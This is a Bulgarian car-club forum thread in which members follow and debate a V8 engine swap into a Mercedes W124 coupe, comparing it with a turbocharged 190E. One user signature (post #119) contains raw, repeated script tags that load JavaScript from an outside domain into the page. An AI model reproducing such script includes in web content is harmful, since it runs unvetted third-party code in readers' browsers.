Проект "TORNADO"или монтиране на "V8 5000" във W124-230CE
Започната от Lorinser, 03 апр 2009 - 01:44:48
222 мнения по тази тема
#106
Публикувано 06 август 2009 - 14:54
Боянски няма ли да направиш едно по дълго видео че да зяпаме тая прелест повечко време така на някое писта нещо или като я завършиш ще ни я покажеш
От ръждата и човешката завист няма спасение.....
#107
Публикувано 21 август 2009 - 16:02
моята дърпа зверски във всички обороти, буста почва от доста ниско ~ 1500 оборота а на ~2600 имам максимално налягане . Проблема при мен обаче е сцеплението, дори на 3-та поднася като и дам пълна газ (гумите са 215/45/17 Pirreli P Zero nero). Определено трябва да се съберем някой път, че имам голямо желание да чуя тоя осмак .
Въпреки всичко аз залагам на 8-мака,пак въпреки че съм пристрастен-хората у немско са го казали Hubraum statt spoiler!
#108
Публикувано 21 август 2009 - 22:15
Въпреки всичко аз залагам на 8-мака,пак въпреки че съм пристрастен-хората у немско са го казали Hubraum statt spoiler!
Ти залагаш, ама турбината си е турбина.....
да не говорим че докато се развърти осмака.....
инак на дълго.... там нещата са други вече
#109
Публикувано 21 август 2009 - 23:12
Няма какво да си говорим просто, осмака си е осмак.
Мен лично много повече ми харесват осмаците, пред 12-цилиндровите миксери.
Но в конкретния случай, мисля че турбинката ще вземе старта.....
Мен лично много повече ми харесват осмаците, пред 12-цилиндровите миксери.
Но в конкретния случай, мисля че турбинката ще вземе старта.....
#110
Публикувано 22 август 2009 - 20:05
Аз това казвах че турбинката ще друпне на старта,а за по нататък ще се чуе
Но като цяло и двата са много добри двигатели..
според мен тук малко бъркате т.е. нещата най-вероятно ще са обратно, осмака има шанс да дръпне на старта тъй като аз имам проблем със сцеплението и трудно слагам силата на асвалта (според мен в момента колата е ~ 280 - 300к.с. на вала, скоро ще е повече ), както казах колата дори и на 3-та в буст тръгва настрани, а как върви на високите скороти ........ само ще кажа многоооо, не подценявайте м103 с турбина
Mercedes-Benz 190E 3.0-24vT @ 0.8 bars ( 1/4 mile: 2.483 / 13.540 / 175.17 km/h )
VW Golf IV GTI 1.8 20v turbo
#111
Публикувано 27 август 2009 - 22:18
темата ще я обновя, като си оправя автоматика. който може да помага, че вече го разчекнах--свалих мозъка и утре ще го разглабям.
ето 2 клипчета с CE-та, да се порадвате малко
http://www.youtube.c...ature=rec-HM-r2
сега си избирам като кой да го направя--джантите вече са ясни--KESKIN KT5
ето 2 клипчета с CE-та, да се порадвате малко
http://www.youtube.c...ature=rec-HM-r2
сега си избирам като кой да го направя--джантите вече са ясни--KESKIN KT5
#112
Публикувано 03 септември 2009 - 08:22
Само разваляме хубавата тема на Боян с тези размисли. Слав нали знаеш поговорката който се притеснява да не ходи в гората. Аз лично нямам никакви притеснения остносно моята кола и съм напълно сигурен ,че ще ме закара там на където съм тръгнал. Това ,че турбо колите са по-ненадежни от атмосферките е мит, има и много атмосферки с излезли биели през блока и счупени бутала. Само ще дам пример с една Р класа 63 АМГ на приятел която скъса клапан малко след като и изтече гаранцията (в момента я правят) . Общо взето тук взе да се води някъкав безмислем спор от рода на този по-бърз ма по се чупи ма пък вози по-добре и тем подобни глупост. Кой по-бърз или по-бавен няма значение, важното е Боян да се кефи на неговата кола както аз се кефия на моята. Лично аз много се радвам на неговия проект тъй като е уникален за България ако не и в Света.
Mercedes-Benz 190E 3.0-24vT @ 0.8 bars ( 1/4 mile: 2.483 / 13.540 / 175.17 km/h )
VW Golf IV GTI 1.8 20v turbo
#113
Публикувано 03 септември 2009 - 10:16
Споко,
Аз ще се изкажа накрая само с едно клипче, без коментар, само да оправя автоматика
най-ми хареса: "V8-мака докато се развърти..."
Аз ще се изкажа накрая само с едно клипче, без коментар, само да оправя автоматика
най-ми хареса: "V8-мака докато се развърти..."
#114
Публикувано 14 септември 2009 - 12:45
Боян и Жорето.... победители в надпреварата за Курило
Жорката наживо не съм го виждал, ама Боянчо си има един трудно скриваем пламък в очите - завършен психопат!
Иначе - Бояне, поклон бате доземи
П.П. Случайно да ти се е "завалял" някой ДВГ от AMG?
Яяя, то какво било, Боянски дай малко инфо, похвали се! Скромността красяла човека, казват, ама ние си те знаем, по-красив няма да станеш, хахаха, похвали се!
#115
Публикувано 14 септември 2009 - 22:33
колеги пак осирате темата
СИРОМАХ DJ , ЖИВ ДЯВОЛ !!!!!
DON`T FUCK WITH MODERATORS!
MY FACEBOOK
http://stara-sofia.com/
Гласувайте за доброто име на "Мерцедес - Бенц Клуб България" В БГ ТОП
#116
Публикувано 19 октомври 2009 - 22:08
За такива усилия може да се кажат само добри думи .
b]А относно бенца нямам думи.[/b]
b]А относно бенца нямам думи.[/b]
#117
Публикувано 09 ноември 2009 - 00:33
Да ъпнем малко темата.
Днес след доста игра, паснахме някои нови елементи, да видим дали някой ще открие разликите ???
Колата е адски мръсна на снимките, но основното се вижда
lets rock`n Roll
малко навън:
след това наложихме и джантите, който току що пристигнаха и разопаковах
ииии едно клипче, което незнаех че е направено от мой приятел на събора на мерцедес в Стара Загора:
Готиното на големия мотор, че не е нужно да го изнасилваш за бърнаут. На клипчето не вдигам повече от 3000оборота, иначе като стигне 5000об/мин, минава на 2ра и стрелката отива на 80-100 (не, не тая на температурата )
и едно което записах, но го бях забравил, то е от вечерта когато поставих гърнетата, та тук е тихичък, по важно е ускорението, което за жалост само се чува
Днес след доста игра, паснахме някои нови елементи, да видим дали някой ще открие разликите ???
Колата е адски мръсна на снимките, но основното се вижда
lets rock`n Roll
малко навън:
след това наложихме и джантите, който току що пристигнаха и разопаковах
ииии едно клипче, което незнаех че е направено от мой приятел на събора на мерцедес в Стара Загора:
Готиното на големия мотор, че не е нужно да го изнасилваш за бърнаут. На клипчето не вдигам повече от 3000оборота, иначе като стигне 5000об/мин, минава на 2ра и стрелката отива на 80-100 (не, не тая на температурата )
и едно което записах, но го бях забравил, то е от вечерта когато поставих гърнетата, та тук е тихичък, по важно е ускорението, което за жалост само се чува
#118
Публикувано 09 ноември 2009 - 07:27
Гледам, нова броня с халогени, раздути калници, джанти...... браво
#119
Публикувано 09 ноември 2009 - 07:35
супер. прилича на чочоне отпред
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#120
Публикувано 09 ноември 2009 - 07:44
Бронята чочонска калниците и те, еи сега вече го направи уникат, за джантите какво става пасват ли както трябва на Стара Загора като бяхме каза нещо, че нестават ли кво беше забравих..
Относно колата станала е МНОГО ДОБРЕ.
Относно колата станала е МНОГО ДОБРЕ.
Три Лъчева Звезда В Кръг -->> Мерцедес-Бенц W124
2 потребител(и) четат тази тема
0 потребители, 2 гости, 0 анонимни